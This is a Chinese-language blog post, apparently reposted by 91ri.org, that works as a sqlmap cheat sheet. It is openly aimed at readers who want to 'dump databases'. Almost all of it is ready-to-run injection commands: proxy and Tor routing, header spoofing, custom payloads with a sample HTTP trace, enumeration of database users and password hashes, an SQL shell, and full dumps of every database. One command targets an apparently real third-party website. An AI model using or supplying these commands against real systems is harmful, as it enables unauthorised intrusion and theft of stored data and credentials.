又一篇sqlmap简单说明

sqlmap可谓是脱裤子神器，我也蛮喜欢用的，只是技术过渣，为了方便更多的想脱裤子的朋友，综合诸多大牛和我并不丰富的使用经验，便有了这篇文章。其实91ri.org在之前也有发布过sqlmap的使用文章，部分还算不错，可以参考《sqlmap使用笔记》《使用sqlmap进行sql注入》

svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

sqlmap.py -u “http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1″ -v 1 –sql-shell //执行SQL语句

sqlmap.py -u “http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1″ -v 5 //更详细的信息

load options from a configuration INI file
sqlmap -c sqlmap.conf

使用POST方法提交
sqlmap.py -u “http://www.91ri.org/ /sqlmap/oracle/post_int.php” –method POST –data “id=1″

使用COOKIES方式提交,cookie的值用;分割,可以使用TamperData来抓cookies
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mssql/cookie_int.php” –cookie “id=1″ -v 1
使用referer欺骗
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/pgsql/get_int.php?id=1″ –referer “http://www.google.com” -v 3

使用自定义user-agent,或者使用随机使用自带的user-agents.txt
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/oracle/get_int.php?id=1″ –user-agent “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)” -v 3

python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mysql/get_int.php?id=1″ -v 1 -a “./txt/user-agents.txt”

使用基本认证
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mysql/basic/get_int.php?id=1″ –auth-type Basic –auth-cred “testuser:testpass” -v 3

使用Digest认证
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mysql/digest/get_int.php?id=1″ –auth-type Digest –auth-cred “testuser:testpass” -v 3

使用代理,配合TOR
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/pgsql/get_int.php?id=1″ –proxy “http://192.168.1.47:3128″
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/pgsql/get_int.php?id=1″ –proxy “http://192.168.1.47:8118″

使用多线程猜解
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mysql/get_int.php?id=1″ -v 1 –current-user –threads 3

绕过动态检测,直接指定有注入点的参数,可以使用,分割多个参数,指定user-agent注入
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/pgsql/get_int.php?id=1″ -v 1 -p “id
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/pgsql/get_int.php?id=1&cat=2″ -v 1 -p “cat,id”
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mysql/ua_str.php” -v 1 -p “user-agent” –user-agent “sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)”

指定数据库,绕过SQLMAP的自动检测
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/pgsql/get_int.php?id=1″ -v 2 –dbms “PostgreSQL”

* MySQL
* Oracle
* PostgreSQL
* Microsoft SQL Server

指定操作系统,绕过SQLMAP自动检测
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/pgsql/get_int.php?id=1″ -v 2 –os “Windows”

* Linux
* Windows

自定义payload
Options: –prefix and –postfix

在某些情况下存在漏洞的参数是利用的只有如果用户提供了一个后缀被追加到注射有效Payload。另一个方案，而这些选项来方便介绍自己当用户已经知道，查询语法，要检测和利用注入直接提供注射有效payload前缀和/或后缀。

Example on a MySQL 5.0.67 target on a page where the SQL query is: $query = “SELECT * FROM users WHERE id=(‘” . $_GET[‘id’] . “‘) LIMIT 0, 1″;:

$ python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mysql/get_str_brackets.php?id=1″ -v 3 -p “id” –prefix “‘” –postfix “AND ‘test’=’test”

[…]
[hh:mm:16] [INFO] testing sql injection on GET parameter ‘id’ with 0 parenthesis
[hh:mm:16] [INFO] testing custom injection on GET parameter ‘id’
[hh:mm:16] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20
%28%27test%27=%27test HTTP/1.1
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: www.91ri.org/ :80
Accept-language: en-us,en;q=0.5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
image/png,*/*;q=0.5
User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
Connection: close
[…]
[hh:mm:17] [INFO] GET parameter ‘id’ is custom injectable
[…]

As you can see, the injection payload for testing for custom injection is:

id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test

which URL decoded is:

id=1′) AND 7433=7433 AND (‘test’=’test

and makes the query syntatically correct to the page query:

SELECT * FROM users WHERE id=(’1′) AND 7433=7433 AND (‘test’=’test’) LIMIT 0, 1

在这个简单的例子，sqlmap可以检测注入和利用它，不需要提供一个自定义注射有效载荷，但有时在实际的应用91ri.org认为是有必要为它。

页面比较
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mysql/get_int_refresh.php?id=1″ –string “luther” -v 1
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mysql/get_int_refresh.php?id=1″ –regexp “ lu[/w][/w]er” -v

排除网站的内容
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mysql/get_int_refresh.php?id=1″ –excl-reg “Dynamic content: ([/d]+)”

多语句测试，php内嵌函数mysql_query(),不支持多语句
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mysql/get_int.php?id=1″ –stacked-test -v 1

union注入测试
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/oracle/get_int.php?id=1″ –union-test -v 1

unionz注入配合orderby
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/pgsql/get_str.php?id=1″ –union-test –union-tech orderby -v 1

python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mssql/get_int.php?id=1″ -v 1 –union-use –banner
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mysql/get_int.php?id=1″ -v 5 –union-use –current-user
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mysql/get_int_partialunion.php?id=1″ -v 1 –union-use –dbs

fingerprint
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mssql/get_int.php?id=1″ -v 1 -f
python sqlmap.py -u “http://192.168.123.36/sqlmap/get_str.asp?name=luther” -v 1 -f -b

判断当前用户是否是dba
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/pgsql/get_int.php?id=1″ –is-dba -v 1

列举数据库用户
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/pgsql/get_int.php?id=1″ –users -v 0

列举数据库用户密码
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mysql/get_int.php?id=1″ –passwords -v 0
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mssql/get_int.php?id=1″ –passwords -U sa -v 0

查看用户权限
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/oracle/get_int.php?id=1″ –privileges -v 0
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/pgsql/get_int.php?id=1″ –privileges -U postgres -v 0

列数据库
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mssql/get_int.php?id=1″ –dbs -v 0

列出指定数据库指定表的列名
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mysql/get_int.php?id=1″ –columns -T users -D test -v 1

列出指定数据库的指定表的指定列的内容
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mssql/get_int.php?id=1″ –dump -T users -D master -C surname -v 0

指定列的范围从2－4
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mysql/get_int.php?id=1″ –dump -T users -D test –start 2 –stop 4 -v 0

导出所有数据库，所有表的内容
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mysql/get_int.php?id=1″ –dump-all -v 0

只列出用户自己新建的数据库和表的内容
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mssql/get_int.php?id=1″ –dump-all –exclude-sysdbs -v 0

sql query
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/pgsql/get_int.php?id=1″ –sql-query “SELECT usename FROM pg_user” -v 0
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/mysql/get_int.php?id=1″ –sql-query “SELECT host, password FROM mysql.user LIMIT 1, 3″ -v 1

SELECT usename, passwd FROM pg_shadow ORDER BY usename

保存和恢复会话
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/pgsql/get_int.php?id=1″ -b -v 1 -s “sqlmap.log”

保存选项到INC配置文件
python sqlmap.py -u “http://www.91ri.org/ /sqlmap/pgsql/get_int.php?id=1″ -b -v 1 –save

link：http://www.redrain.tk/?p=81

本文由网络安全攻防研究室(www.91ri.org)信息安全小组收集整理，转载请注明出处！